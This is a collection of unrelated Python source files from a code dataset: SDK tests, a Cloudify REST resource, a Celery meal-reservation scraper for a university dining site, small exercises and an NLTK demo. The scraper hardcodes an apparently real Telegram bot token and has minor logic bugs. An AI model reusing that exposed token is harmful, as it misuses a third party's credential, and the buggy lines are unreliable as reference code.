+{"seq_id":"419325369","text":"#!/usr/bin/env python\n#\n# Copyright 2011-2012 Splunk, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"): you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport splunklib.client as client\n\nimport testlib\n\nclass TestCase(testlib.TestCase):\n # Verify that the given collections interface behaves as expected\n def check_collection(self, collection):\n # Check item metadata\n try:\n metadata = collection.itemmeta()\n self.assertTrue(isinstance(metadata, dict))\n self.assertTrue(isinstance(metadata.access, dict))\n self.assertTrue(isinstance(metadata.fields, dict))\n except client.NotSupportedError: pass\n\n # Check various collection options\n collection.list() # Default\n collection.list(search=\"title=*\")\n collection.list(sort_dir=\"asc\")\n collection.list(sort_dir=\"desc\")\n collection.list(sort_mode=\"auto\")\n collection.list(sort_mode=\"alpha\")\n collection.list(sort_mode=\"alpha_case\")\n collection.list(sort_mode=\"num\")\n\n # Retrieve the entire list\n items = collection.list()\n total = len(items)\n\n # Make sure the default list method returns all items\n items0 = collection.list(count=0)\n total0 = len(items0)\n self.assertEqual(total, total0)\n\n self.check_iterable(collection, total)\n\n # Page through contents one-at-a-time and check count\n count = 0\n for i in xrange(total):\n item = collection.list(offset=i, count=1)\n self.assertEqual(len(item), 1)\n count += 1\n self.assertEqual(count, total)\n\n # Page through the collection using various page sizes and make sure\n # the expected paging invariants hold.\n page_size = int(total/2)\n while page_size > 0:\n offset = 0\n while offset < total:\n page = collection.list(offset=offset, count=page_size)\n count = len(page)\n offset += count\n self.assertTrue(count == page_size or offset == total)\n self.assertEqual(offset, total)\n page_size = int(page_size/2) # Try half the page size\n\n # Verify that the given collection's iterator works as expected.\n def check_iterable(self, collection, count):\n # Iterate contents and make sure we see the expected count.\n seen = 0\n for item in collection: \n seen += 1\n self.assertEqual(seen, count)\n\n def test_apps(self):\n service = client.connect(**self.opts.kwargs)\n self.check_collection(service.apps)\n\n def test_event_types(self):\n service = client.connect(**self.opts.kwargs)\n self.check_collection(service.event_types)\n\n def test_indexes(self):\n service = client.connect(**self.opts.kwargs)\n self.check_collection(service.indexes)\n\n def test_inputs(self):\n # The Inputs collection is an aggregated view of the various REST API\n # input endpoints, and does not support the paging interface.\n service = client.connect(**self.opts.kwargs)\n count = len(service.inputs.list())\n self.check_iterable(service.inputs, count)\n\n def test_jobs(self):\n # The Jobs REST API endpoint does not support the paging interface.\n service = client.connect(**self.opts.kwargs)\n count = len(service.jobs.list())\n self.check_iterable(service.jobs, count)\n\n def test_loggers(self):\n service = client.connect(**self.opts.kwargs)\n self.check_collection(service.loggers)\n\n def test_messages(self):\n service = client.connect(**self.opts.kwargs)\n self.check_collection(service.messages)\n\n def test_roles(self):\n service = client.connect(**self.opts.kwargs)\n self.check_collection(service.roles)\n\n def test_users(self):\n service = client.connect(**self.opts.kwargs)\n self.check_collection(service.users)\n\nif __name__ == \"__main__\":\n testlib.main()\n\n","sub_path":"tests/test_collection.py","file_name":"test_collection.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"185059217","text":"#########\n# Copyright (c) 2019 Cloudify Platform Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\n\nfrom flask import request, current_app\nfrom flask_restful_swagger import swagger\n\nfrom cloudify._compat import text_type\nfrom cloudify.cluster_status import CloudifyNodeType, ServiceStatus\n\nfrom manager_rest.rest import responses\nfrom manager_rest.utils import get_formatted_timestamp\nfrom manager_rest.security.authorization import authorize\nfrom manager_rest.rest.rest_decorators import marshal_with\nfrom manager_rest.storage import models, get_storage_manager\nfrom manager_rest.security import SecuredResourceBannedSnapshotRestore\nfrom manager_rest.cluster_status_manager import (STATUS,\n get_cluster_status,\n write_status_report)\nfrom manager_rest.rest.rest_utils import (parse_datetime_string,\n verify_and_convert_bool,\n get_json_and_verify_params)\n\n\nclass ClusterStatus(SecuredResourceBannedSnapshotRestore):\n @staticmethod\n def _get_request_dict():\n request_dict = get_json_and_verify_params({\n 'reporting_freq': {'type': int},\n 'report': {'type': dict},\n 'timestamp': {'type': text_type}\n })\n return request_dict\n\n def _write_report(self, node_id, model, node_type):\n report_dict = self._get_request_dict()\n write_status_report(node_id, model, node_type, report_dict)\n\n @swagger.operation(\n responseClass=responses.Status,\n nickname=\"cluster-status\",\n notes=\"Returns state of the Cloudify cluster\"\n )\n @authorize('cluster_status_get')\n @marshal_with(responses.Status)\n def get(self):\n \"\"\"Get the status of the entire cloudify cluster\"\"\"\n summary_response = verify_and_convert_bool(\n 'summary',\n request.args.get('summary', False)\n )\n cluster_status = get_cluster_status()\n\n # If the response should be only the summary\n if summary_response:\n short_status = cluster_status.get(STATUS)\n status_code = 500 if short_status == ServiceStatus.FAIL else 200\n return {'status': short_status, 'services': {}}, status_code\n\n return cluster_status\n\n\nclass ManagerClusterStatus(ClusterStatus):\n @authorize('manager_cluster_status_put')\n def put(self, node_id):\n self._update_manager_last_seen(node_id)\n self._write_report(node_id,\n models.Manager,\n CloudifyNodeType.MANAGER)\n\n @staticmethod\n def _update_manager_last_seen(node_id):\n report = request.json.get('report', {})\n if report.get('status') != ServiceStatus.HEALTHY:\n current_app.logger.debug(\n \"The manager with node_id: {0} is not healthy, so it's \"\n \"last_seen is not updated\".format(node_id)\n )\n return\n\n storage_manager = get_storage_manager()\n manager = storage_manager.get(models.Manager, None,\n filters={'node_id': node_id})\n manager_time = parse_datetime_string(manager.last_seen)\n report_time = request.json.get('timestamp')\n if report_time and manager_time < parse_datetime_string(report_time):\n manager.last_seen = get_formatted_timestamp()\n manager.status_report_frequency = request.json.get(\n 'reporting_freq')\n storage_manager.update(manager)\n\n\nclass DBClusterStatus(ClusterStatus):\n @authorize('db_cluster_status_put')\n def put(self, node_id):\n self._write_report(node_id,\n models.DBNodes,\n CloudifyNodeType.DB)\n\n\nclass BrokerClusterStatus(ClusterStatus):\n @authorize('broker_cluster_status_put')\n def put(self, node_id):\n self._write_report(node_id,\n models.RabbitMQBroker,\n CloudifyNodeType.BROKER)\n","sub_path":"rest-service/manager_rest/rest/resources_v3_1/cluster_status.py","file_name":"cluster_status.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"121795363","text":"import re\n\nimport imgkit\nimport jdatetime\nimport pandas as pd\nimport requests\nimport telegram\nfrom bs4 import BeautifulSoup\nfrom celery import task\nfrom django.db.models import Q\nfrom lxml import html\n\n\ndef login(user_data):\n login_url = user_data.university.login_url\n session_requests = requests.session()\n result = session_requests.get(login_url)\n csrf = user_data.university.csrf_name\n tree = html.fromstring(result.text)\n authenticity_token = list(set(tree.xpath(f\"//input[@name='{csrf}']/@value\")))[0]\n payload = {\n user_data.university.form_username: user_data.dining_username,\n user_data.university.form_password: user_data.dining_password,\n user_data.university.csrf_name: authenticity_token,\n }\n result = session_requests.post(login_url, data=payload, headers=dict(referer=login_url))\n if 'login' not in result.url:\n return session_requests.cookies\n else:\n raise ValueError\n\n\ndef get_user_id(cookie):\n reserve_url = 'http://dining.sharif.ir/admin/food/food-reserve/reserve'\n session_requests = requests.session()\n session_requests.cookies = cookie\n result = session_requests.get(reserve_url)\n soup = BeautifulSoup(result.content, 'html.parser')\n\n try:\n button = soup.find_all('button', class_=\"btn btn-default navigation-link\")[0].get('onclick')\n return button.split(';')[0].split(',')[4][:-1]\n except IndexError:\n raise ValueError\n\n\ndef get_next_week_dishes(user_data, cookie, self_id, user_id):\n from dining.models import Food, UserPreferableFood\n\n session_requests = requests.session()\n session_requests.cookies = cookie\n\n next_week = {\n 'id': 0,\n 'parent_id': self_id,\n 'week': 1,\n 'user_id': user_id\n }\n\n load_reserve_table = 'http://dining.sharif.ir/admin/food/food-reserve/load-reserve-table'\n\n result = session_requests.post(load_reserve_table, data=next_week)\n\n soup = BeautifulSoup(result.content, 'html.parser')\n\n table_rows = soup.find_all('tr')[1:]\n\n data_lunch = dict()\n data_dinner = dict()\n for row in table_rows:\n day = re.findall(r'\\s+(.*?)\\s\\s', str(row))[0]\n lunch = row.find_all('td')[0].find_all('div')\n dishes = list()\n for dish in lunch:\n try:\n food_name = dish.text.split('(')[0].strip()\n food_id = dish.find('span').get('onclick').split('do_reserve_from_diet(')[1].split(',')[0].strip('\\\"')\n query = Food.objects.filter(name__icontains=food_name, university=user_data.university)\n if query:\n dishes.append((query[0].name, food_id))\n else:\n new_food = Food()\n new_food.name = food_name\n new_food.id = food_id\n new_food.save()\n dishes.append((food_name, food_id))\n preferred_food_object = UserPreferableFood()\n preferred_food_object.user = user_data.user\n preferred_food_object.food = new_food\n preferred_food_object.score = 5\n preferred_food_object.save()\n\n except:\n pass\n data_lunch[day] = dishes\n\n dinner = row.find_all('td')[1].find_all('div')\n dishes = list()\n for dish in dinner:\n try:\n food_name = dish.text.split('(')[0].strip()\n food_id = dish.find('span').get('onclick').split('do_reserve_from_diet(')[1].split(',')[0].strip('\\\"')\n query = Food.objects.filter(name__icontains=food_name, university=user_data.university)\n if query:\n dishes.append((query[0].name, food_id))\n else:\n new_food = Food()\n new_food.name = food_name\n new_food.id = food_id\n new_food.save()\n dishes.append((food_name, food_id))\n preferred_food_object = UserPreferableFood\n preferred_food_object.user = user_data.user\n preferred_food_object.food = new_food\n preferred_food_object.score = 5\n preferred_food_object.save()\n\n except:\n pass\n\n data_dinner[day] = dishes\n\n return data_lunch, data_dinner\n\n\ndef save_values(user_data, data_lunch, data_dinner, self_id):\n from dining.models import Dicty, Key, Val\n\n try:\n dictionary_model = Dicty.objects.get(name=user_data.user.username + 'data_dinner' + f'{self_id}')\n Key.objects.filter(container__name=user_data.user.username + 'data_dinner' + f'{self_id}').delete()\n\n\n except:\n dictionary_model = Dicty()\n dictionary_model.name = user_data.user.username + 'data_dinner' + f'{self_id}'\n dictionary_model.save()\n\n for item in data_dinner:\n key = Key()\n key.container = dictionary_model\n key.key = item\n key.save()\n for food in data_dinner[item]:\n value = Val()\n value.key = key\n value.container = dictionary_model\n value.name = food[0]\n value.food_id = food[1]\n value.save()\n try:\n dictionary_model = Dicty.objects.get(name=user_data.user.username + 'data_lunch' + f'{self_id}')\n Key.objects.filter(container__name=user_data.user.username + 'data_lunch' + f'{self_id}').delete()\n\n except:\n dictionary_model = Dicty()\n dictionary_model.name = user_data.user.username + 'data_lunch' + f'{self_id}'\n dictionary_model.save()\n\n for item in data_lunch:\n key = Key()\n key.container = dictionary_model\n key.key = item\n key.save()\n for food in data_lunch[item]:\n value = Val()\n value.key = key\n value.container = dictionary_model\n value.name = food[0]\n value.food_id = food[1]\n value.save()\n\n\ndef do_reserve(food_id, self_id, user_id, cookie):\n food_reserve_request = {\n 'id': food_id,\n 'place_id': self_id,\n 'food_place_id': '0',\n 'self_id': self_id,\n 'user_id': user_id\n }\n session_requests = requests.session()\n session_requests.cookies = cookie\n result = session_requests.post(\n 'http://dining.sharif.ir/admin/food/food-reserve/do-reserve-from-diet?user_id=' + user_id,\n data=food_reserve_request)\n soup = BeautifulSoup(result.content, 'html.parser')\n\n\ndef get_reserved_table(user_data, user_id, cookie):\n session_requests = requests.session()\n session_requests.cookies = cookie\n next_week_reserved_table = {\n 'week': '1',\n 'user_id': user_id\n }\n url_reserved_table = user_data.university.reserved_table\n result = session_requests.post(url_reserved_table, data=next_week_reserved_table)\n soup = BeautifulSoup(result.content, 'html.parser')\n\n table_rows = soup.find_all('tr')[1:]\n\n data_lunch = dict()\n data_dinner = dict()\n for row in table_rows:\n day = re.findall(r'\\s+(.*?)\\s\\s', str(row))[0]\n lunch = row.find_all('td')[0]\n dishes = list()\n try:\n food_name = lunch.text.split('(')[0].strip()\n dishes.append(food_name)\n except:\n dishes.append('-')\n data_lunch[day] = dishes\n\n dinner = row.find_all('td')[1]\n dishes = list()\n try:\n food_name = dinner.find_all('span')[0].text.strip()\n dishes.append(food_name)\n except:\n dishes.append('-')\n\n data_dinner[day] = dishes\n\n result = session_requests.get('http://dining.sharif.ir/admin/payment/payment/charge')\n soup = BeautifulSoup(result.text, 'html.parser')\n soup_find = soup.find_all('h4', {'class': 'control-label'})\n credit_raw = soup_find[0].find_all('span', {'dir': 'ltr'})[0].text.strip()\n credit = float(re.sub(',', '.', credit_raw))\n\n return data_lunch, data_dinner, credit\n\n\ndef telegram_table_message(user_data, data_lunch, data_dinner):\n if user_data.user.chat_id != 0:\n data = {'ناهار': [data_lunch['شنبه'], data_lunch['یک شنبه'], data_lunch['دوشنبه'],\n data_lunch['سه شنبه'], data_lunch['چهارشنبه'], data_lunch['پنج شنبه'],\n data_lunch['جمعه']],\n 'شام': [data_dinner['شنبه'], data_dinner['یک شنبه'], data_dinner['دوشنبه'],\n data_dinner['سه شنبه'], data_dinner['چهارشنبه'], data_dinner['پنج شنبه'],\n data_dinner['جمعه']]}\n df = pd.DataFrame(data,\n index=['شنبه', 'یکشنبه', 'دوشنبه', 'سه‌شنبه', 'چهارشنبه', 'پنجشنبه', 'جمعه'])\n\n css = \"\"\"\n \n \n \n \n \n \"\"\"\n with open('html.html', 'w') as f:\n f.write('')\n text_file = open(\"html.html\", \"a\")\n text_file.write(css)\n text_file.write(df.to_html())\n text_file.close()\n imgkitoptions = {\"format\": \"png\"}\n imgkit.from_file(\"html.html\", 'reserve_img.png', options=imgkitoptions)\n\n def send_photo(path, chat_id, token):\n bot = telegram.Bot(token=token)\n bot.send_photo(chat_id=chat_id, photo=open(path, 'rb'))\n\n def send(msg, chat_id, token, keyboard):\n bot = telegram.Bot(token=token)\n bot.send_message(chat_id=chat_id, text=msg, reply_markup=keyboard)\n\n bot_token = '610448118:AAFVPBXMKPzqAiOJ9-zhusKrOloCiJuEwi8'\n message = \"سلام\\n\" \\\n \"امروز چهارشنبه‌س و غذاهاتو برات رزرو کردم \\n\" \\\n \"اگر از هر کدومشون خوشت نیمد یا خواستی روز جدیدی رو رزرو کنی دکمه‌ی تغییر رزرو رو فشار بده\"\n reply_markup = telegram.ReplyKeyboardMarkup(\n [[telegram.KeyboardButton('تغییر رزرو')]], one_time_keyboard=False)\n send(message, str(user_data.user.chat_id), bot_token, reply_markup)\n send_photo(path='reserve_img.png',\n chat_id=str(user_data.user.chat_id),\n token=bot_token)\n\n\n@task()\ndef reserve_function():\n from dining.models import UserDiningData, UserSelfs, UserPreferableFood, ReservedTable\n for user_data in UserDiningData.objects.filter(university__tag='sharif'):\n if user_data.user.is_paid is True and user_data.user.reserve is True:\n\n active_selfs = UserSelfs.objects.filter(user=user_data.user, is_active=True)\n try:\n cookie = login(user_data)\n except ValueError:\n continue\n try:\n user_id = get_user_id(cookie)\n except ValueError:\n continue\n\n for self in active_selfs:\n\n data_lunch, data_dinner = get_next_week_dishes(user_data, cookie, self.self_id, user_id)\n save_values(user_data, data_lunch, data_dinner, self.self_id)\n\n chosen_days_lunch = []\n\n if user_data.reserve_friday_lunch:\n chosen_days_lunch.append('جمعه')\n if user_data.reserve_saturday_lunch:\n chosen_days_lunch.append('شنبه')\n if user_data.reserve_sunday_lunch:\n chosen_days_lunch.append('یک شنبه')\n if user_data.reserve_monday_lunch:\n chosen_days_lunch.append('دوشنبه')\n if user_data.reserve_tuesday_lunch:\n chosen_days_lunch.append('سه شنبه')\n if user_data.reserve_wednesday_lunch:\n chosen_days_lunch.append('چهارشنبه')\n if user_data.reserve_thursday_lunch:\n chosen_days_lunch.append('پنج شنبه')\n\n chosen_days_dinner = []\n\n if user_data.reserve_friday_dinner:\n chosen_days_dinner.append('جمعه')\n if user_data.reserve_saturday_dinner:\n chosen_days_dinner.append('شنبه')\n if user_data.reserve_sunday_dinner:\n chosen_days_dinner.append('یک شنبه')\n if user_data.reserve_monday_dinner:\n chosen_days_dinner.append('دوشنبه')\n if user_data.reserve_tuesday_dinner:\n chosen_days_dinner.append('سه شنبه')\n if user_data.reserve_wednesday_lunch:\n chosen_days_dinner.append('چهارشنبه')\n if user_data.reserve_thursday_dinner:\n chosen_days_dinner.append('پنج شنبه')\n\n for day in chosen_days_lunch:\n preferred_foods = []\n for dish in data_lunch[day]:\n if UserPreferableFood.objects.filter(~Q(score=0), user=user_data.user,\n food__name=dish[0].strip()):\n preferred_foods.append((dish[1], UserPreferableFood.objects.filter(\n user=user_data.user,\n food__name=dish[0])[0].score))\n preferred_foods.sort(key=lambda x: x[1], reverse=True)\n if preferred_foods:\n do_reserve(preferred_foods[0][0], self.self_id, user_id, cookie)\n\n for day in chosen_days_dinner:\n preferred_foods = []\n for dish in data_dinner[day]:\n if UserPreferableFood.objects.filter(~Q(score=0), user=user_data.user, food__name=dish[0]):\n preferred_foods.append((dish[1], UserPreferableFood.objects.filter(\n user=user_data.user,\n food__name=dish[0])[0].score))\n preferred_foods.sort(key=lambda x: x[1], reverse=True)\n if preferred_foods:\n do_reserve(preferred_foods[0][0], self.self_id, user_id, cookie)\n\n data_lunch, data_dinner, credit = get_reserved_table(user_data, user_id, cookie)\n\n date = str(jdatetime.date.today() + jdatetime.timedelta(3))\n date = re.sub(r'\\-', '/', date)\n saturdays_date = list()\n saturdays_date.append(date)\n saturdays_date = str(saturdays_date)\n\n filter = ReservedTable.objects.filter(user=user_data.user, week_start_date=saturdays_date)\n flag = True\n if not filter:\n reserved = ReservedTable()\n reserved.user = user_data.user\n\n reserved.week_start_date = saturdays_date\n\n reserved.friday_lunch = data_lunch['جمعه'][0]\n reserved.saturday_lunch = data_lunch['شنبه'][0]\n reserved.sunday_lunch = data_lunch['یک شنبه'][0]\n reserved.monday_lunch = data_lunch['دوشنبه'][0]\n reserved.tuesday_lunch = data_lunch['سه شنبه'][0]\n reserved.wednesday_lunch = data_lunch['چهارشنبه'][0]\n reserved.thursday_lunch = data_lunch['پنج شنبه'][0]\n\n reserved.friday_dinner = data_dinner['جمعه'][0]\n reserved.saturday_dinner = data_dinner['شنبه'][0]\n reserved.sunday_dinner = data_dinner['یک شنبه'][0]\n reserved.monday_dinner = data_dinner['دوشنبه'][0]\n reserved.tuesday_dinner = data_dinner['سه شنبه'][0]\n reserved.wednesday_dinner = data_dinner['چهارشنبه'][0]\n reserved.thursday_dinner = data_dinner['پنج شنبه'][0]\n\n reserved.credit = credit\n\n reserved.save()\n\n else:\n flag = False\n filter[0].friday_lunch = data_lunch['جمعه'][0]\n filter[0].saturday_lunch = data_lunch['شنبه'][0]\n filter[0].sunday_lunch = data_lunch['یک شنبه'][0]\n filter[0].monday_lunch = data_lunch['دوشنبه'][0]\n filter[0].tuesday_lunch = data_lunch['سه شنبه'][0]\n filter[0].wednesday_lunch = data_lunch['چهارشنبه'][0]\n filter[0].thursday_lunch = data_lunch['پنج شنبه'][0]\n\n filter[0].friday_dinner = data_dinner['جمعه'][0]\n filter[0].saturday_dinner = data_dinner['شنبه'][0]\n filter[0].sunday_dinner = data_dinner['یک شنبه'][0]\n filter[0].monday_dinner = data_dinner['دوشنبه'][0]\n filter[0].tuesday_dinner = data_dinner['سه شنبه'][0]\n filter[0].wednesday_dinner = data_dinner['چهارشنبه'][0]\n filter[0].thursday_dinner = data_dinner['پنج شنبه'][0]\n\n filter[0].credit = credit\n\n filter[0].save()\n\n if flag:\n try:\n telegram_table_message(user_data, data_lunch, data_dinner)\n except:\n continue\n","sub_path":"dining/tasks/reservation_sharif.py","file_name":"reservation_sharif.py","file_ext":"py","file_size_in_byte":18000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"633359863","text":"import cv2\nimport matplotlib.pyplot as plt\n\nimage = cv2.imread('images/NTNUME.png', cv2.IMREAD_GRAYSCALE)\n\nplt.imshow(image, cmap='gray')\nplt.axis('off')\nplt.show()\n\ncv2.imwrite('images/NTNUME_new.png', image)\n","sub_path":"Machine-Learning/Preprocessing-Images/code/Save-Images.py","file_name":"Save-Images.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"113634270","text":"wid = int(input(\"Width: \"))\n\n#no. of lines will be double the width\n#each loop prints a line.\nfor i in range(wid *2):\n\n #first half of the diamond\n if i<=wid:\n no_of_spaces = wid - i\n no_of_stars = i\n print(\" \"*no_of_spaces + \"* \"*no_of_stars) \n\n #next half of the diamond\n else:\n no_of_spaces = i - wid\n no_of_stars = 2*wid - i\n print(\" \"*no_of_spaces + \"* \"*no_of_stars) \n","sub_path":"diamond.py","file_name":"diamond.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"170882239","text":"import json\nimport traceback\nfrom celery import Task\nfrom redis import Redis\nfrom celery_app import RESULT_POOL\nfrom celery._state import _task_stack\nfrom celery.utils.log import get_task_logger\nfrom backend.Model.connection import SESSION\nfrom backend.myBluePrint.ericic_v2.model.refresh_task_history_table import RefreshTaskHistoryModel\n\nlogger = get_task_logger(__name__)\n\n\nclass DBFreshBase(Task):\n #: Request class used, or the qualified name of one.\n Request = 'celeryFolder.taskModel.customer.db_refresh_request:DBRefreshRequest'\n\n def __call__(self, *args, **kwargs):\n request = self.request\n job_id = request.id\n db_session = SESSION()\n # the status of record always follows a linear change, so does not use the version\n try:\n db_session.query(RefreshTaskHistoryModel).filter(RefreshTaskHistoryModel.id == job_id).update(\n {'status': 'running'})\n db_session.commit()\n except:\n db_session.rollback()\n msg = traceback.format_exc()\n logger.info(msg)\n finally:\n db_session.close()\n _task_stack.push(self)\n self.push_request(args=args, kwargs=kwargs)\n try:\n return self.run(*args, **kwargs)\n finally:\n self.pop_request()\n _task_stack.pop()\n\n # task success call back\n def on_success(self, retval, task_id, *args, **kwargs):\n logger.info(f'task id:{task_id}, arg:{args}, successful!')\n self._self_call_back(task_id, 'successful')\n\n # task failure call back\n def on_failure(self, exc, task_id, *args, **kwargs):\n logger.info(f'task id:{task_id}, arg:{args}, failed! erros:{exc}')\n self._self_call_back(task_id, 'failed')\n\n # task retry call back\n def on_retry(self, exc, task_id, *args, **kwargs):\n logger.info(f'task id:{task_id}, arg:{args}, retry! einfo:{exc}')\n\n def _self_call_back(self, task_id, status):\n rds = Redis(connection_pool=RESULT_POOL)\n db_session = SESSION()\n try:\n res = rds.get('celery-task-meta-%s' % task_id)\n res = json.loads(res)\n error = res['traceback']\n db_session.query(RefreshTaskHistoryModel).filter(RefreshTaskHistoryModel.id == task_id).update({\n 'status': status,\n 'error_info': error\n })\n db_session.commit()\n rds.delete('celery-task-meta-%s' % task_id)\n except Exception as e:\n db_session.rollback()\n raise e\n # TaskHistoryModel()\n finally:\n rds.close()\n db_session.close()\n","sub_path":"gzbj/optimus_2.1/optimus/celeryFolder/taskModel/db_fresh/taskBase.py","file_name":"taskBase.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"616404235","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 20 15:34:24 2017\n\n@author: Lafungo\n\"\"\"\n\nimport datetime\n\nstart = datetime.datetime.now()\n\nf = open('p067_triangle.txt', 'r')\n\nnumbers = []\n\nfor line in f:\n numbers.append(line.strip().split())\n\nf.close()\n \nfor row in reversed(range(len(numbers) - 1)):\n for index in range(len(numbers[row])):\n numbers[row][index] = int(numbers[row][index]) + \\\n max([int(numbers[row + 1][index]), \n int(numbers[row + 1][index + 1])]) \n\nprint(numbers[0][0])\n\nend = datetime.datetime.now()\nprint(end - start)\n","sub_path":"p67.py","file_name":"p67.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"318741789","text":"import os;\nimport re;\n\ndef main():\n cl = 0;\n cf = \"\";\n numcheck = \"[^0-9]\";\n contents = [\"\"];\n proceed = True;\n while proceed == True:\n cltext = input();\n if cltext.startswith(\"\"):\n if os.path.exists(cf):\n for line in contents:\n print(line, end = \"\");\n else:\n print(\"That file does not exist!\");\n if cltext.startswith(\"\"):\n cf = input(\"Enter a filename here: \");\n if os.path.exists(cf):\n file = open(cf, \"r\");\n fcontents = file.readlines();\n file.close();\n for line in fcontents:\n print(line, end = \"\");\n else:\n print(\"That file does not exist!\");\n elif cltext.startswith(\"\"):\n if os.path.exists(cf):\n file = open(cf, \"a\");\n for line in range(len(contents)):\n file.write(contents[line]);\n file.close();\n elif cltext.startswith(\"\"):\n cf = input(\"Enter a filename here: \");\n file = open(cf, \"w\");\n file.write(\"\");\n file = open(cf, \"a\");\n for line in range(len(contents)):\n file.write(contents[line]);\n file.close();\n elif cltext.startswith(\"\"):\n for line in range(len(contents) - 1):\n print(str(line + 1) + \":\", contents[line], end = \"\");\n cl = input(\"Enter a line number here: \");\n if re.search(numcheck, cl):\n print(\"Invalid line number!\");\n else:\n cl = int(cl) - 1;\n if cl > len(contents):\n print(\"Invalid line number!\");\n else:\n contents[cl] = cltext + \"\\n\";\n contents.append(\"\");\n cl += 1;\n\nif __name__ == \"__main__\":\n main();\n","sub_path":"random/fedit.py","file_name":"fedit.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"570667951","text":"from nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize \nexample_sentence = \"Hello world this is my first nltk program. This is word tokenization in which the we will seperate all the words\"\nstop_words = set(stopwords.words(\"english\")) # This will print some of the stop words in english lanaguage\nwords = word_tokenize(example_sentence)\nuseful_words = [] # All the words which are not stop words in our sentence\nfor w in words:\n if w not in stop_words:\n useful_words.append(w)\nprint(useful_words)","sub_path":"basics/stopwords.py","file_name":"stopwords.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"106825597","text":"import json\n\nimport pytest\n\nfrom burdock.restclient.models.project_run_details import ProjectRunDetails\n\n@pytest.mark.parametrize(\"project\", [{\"params\": {\"alpha\": .4}, \"uri\": \"https://github.com/mlflow/mlflow-example\"},\n {\"params\": {\"text\": \"this text\"}, \"uri\":\n \"./modules/module-example\"}])\ndef test_execute_run(client, project):\n details = ProjectRunDetails(params=json.dumps(project[\"params\"]),\n project_uri=project[\"uri\"])\n client.executerun(details)\n\n","sub_path":"tests/service/execute/test_smoke.py","file_name":"test_smoke.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"449498591","text":"#!flask/bin/python\nfrom upload_images import binary_to_image, get_db_collection\nfrom flask import Flask\nimport pandas as pd\n\n\napp = Flask(__name__)\n\n\n@app.route('/image/')\ndef get_image_by_md5(md5):\n image = get_db_collection(\"image_handler\").find_one({\"md5\": md5})\n if not image:\n raise FileNotFoundError(f\"Can not found image with md5 {md5}\")\n binary_to_image(image[\"original_image\"]).show()\n return \"200 ok\"\n\n\n@app.route('/monitoring')\ndef monitor_images():\n agg_status = get_db_collection(\"image_status\").aggregate(\n [\n {\n \"$group\":\n {\n \"_id\": {\n \"minutes\": {\n \"$dateToString\": {\n \"date\": \"$created_at\",\n \"format\": \"%Y-%m-%dT%H:%M\"\n }\n },\n \"error_status\": \"$with_error\"\n },\n \"number_event\": {\n \"$sum\": 1\n }\n }\n }\n ]\n )\n df_agg_status = pd.DataFrame(list(agg_status))\n print(df_agg_status)\n df_agg_status.plot.hist()\n return \"200 ok\"\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"src/core/api_image.py","file_name":"api_image.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"525560753","text":"# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.2'\n# jupytext_version: 1.2.1\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# %% [markdown] {\"toc\": true}\n#

Table of Contents

